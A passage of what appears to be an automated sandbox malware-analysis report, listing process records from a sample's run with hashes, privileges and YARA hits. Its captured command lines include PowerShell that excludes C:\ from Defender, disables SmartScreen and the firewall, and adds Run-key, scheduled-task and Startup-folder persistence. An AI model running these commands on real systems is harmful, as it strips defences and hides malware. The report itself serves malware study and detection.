                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:40
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:41
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:42
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:42
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:42
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
                                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:43
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\ProgramData\MicrosoftNetwork\System.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\ProgramData\MicrosoftNetwork\System.exe"
                                                                                                                                                                                Imagebase:0x7ff7ce430000
                                                                                                                                                                                File size:3731093 bytes
                                                                                                                                                                                MD5 hash:7663A0F9957107E7EF91C493A3C85261
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:43
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:43
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:44
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:44
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
                                                                                                                                                                                Imagebase:0x7ff64e5e0000
                                                                                                                                                                                File size:185856 bytes
                                                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:45
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:45
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:45
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
                                                                                                                                                                                Imagebase:0xf20000
                                                                                                                                                                                File size:59392 bytes
                                                                                                                                                                                MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:46
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:46
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:47
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\ProgramData\UpSys.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                File size:945944 bytes
                                                                                                                                                                                MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000002B.00000003.466253195.00000000030D1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000002B.00000002.469682107.00000000007EB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 0%, Metadefender, Browse
                                                                                                                                                                                • Detection: 0%, ReversingLabs

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:48
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:48
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:49
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:49
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:50
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                Imagebase:0xc80000
                                                                                                                                                                                File size:2776885 bytes
                                                                                                                                                                                MD5 hash:2BC350586FBDE00FFF7707D69C30941F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:51
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                                                                Imagebase:0x7ff64e5e0000
                                                                                                                                                                                File size:92672 bytes
                                                                                                                                                                                MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:51
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:52
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:53
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:53
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:54
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:54
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                                                                                                                                                                                Imagebase:0x7ff617cb0000
                                                                                                                                                                                File size:447488 bytes
                                                                                                                                                                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:54
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:54
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:54
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:55
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:55
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:55
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\ProgramData\UpSys.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                File size:945944 bytes
                                                                                                                                                                                MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000003D.00000002.492202366.00000000007ED000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000003D.00000003.468230978.0000000003101000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:56
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:57
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:57
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:58
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                Imagebase:0x7ff7eef80000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:58
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff7db4b0000
                                                                                                                                                                                File size:94720 bytes
                                                                                                                                                                                MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:26:58
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:01
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                                File size:273920 bytes
                                                                                                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:02
                                                                                                                                                                                Start date:11/11/2021
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                General

                                                                                                                                                                                Start time:12:27:02
                                                                                                                                                                                Start date:11/11/2021
